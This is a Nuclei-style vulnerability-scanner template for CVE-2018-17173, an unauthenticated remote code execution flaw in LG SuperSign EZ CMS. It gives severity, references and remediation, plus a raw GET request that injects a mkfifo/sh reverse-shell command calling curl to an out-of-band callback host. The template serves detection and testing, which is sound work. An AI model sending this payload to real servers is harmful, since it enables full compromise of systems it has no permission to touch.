id: CVE-2018-17173 info: name: LG Supersign EZ CMS - Remote Code Execution author: pussycat0x severity: critical description: | LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail. impact: | Unauthenticated attackers can execute arbitrary system commands on LG SuperSign CMS servers via the sourceUri parameter, leading to complete server compromise and potential access to connected digital signage systems. remediation: | Upgrade to a patched version of LG SuperSign CMS that addresses CVE-2018-17173. reference: - http://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html - http://packetstormsecurity.com/files/152733/LG-Supersign-EZ-CMS-Remote-Code-Execution.html - https://www.exploit-db.com/exploits/45448/ - https://www.exploit-db.com/exploits/46795/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17173 cwe-id: CWE-94 epss-score: 0.79034 epss-percentile: 0.99083 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lg product: supersign_cms fofa-query: title="LG SuperSign" tags: cve,cve2018,lg,supersign-cms,rce,vkev,vuln http: - raw: - | GET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - "dns" condition: or - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 490a0046304402201e20d70ab969c5b87c518c8bd47cc5b08f45c15e671ce571c6f20bc5693a1418022024e2ce0ae25a80bd560baecd87e9cc9f977cd05c79b65a939561b442d7b9b2e0:922c64590222798bb761d5b6d8e72950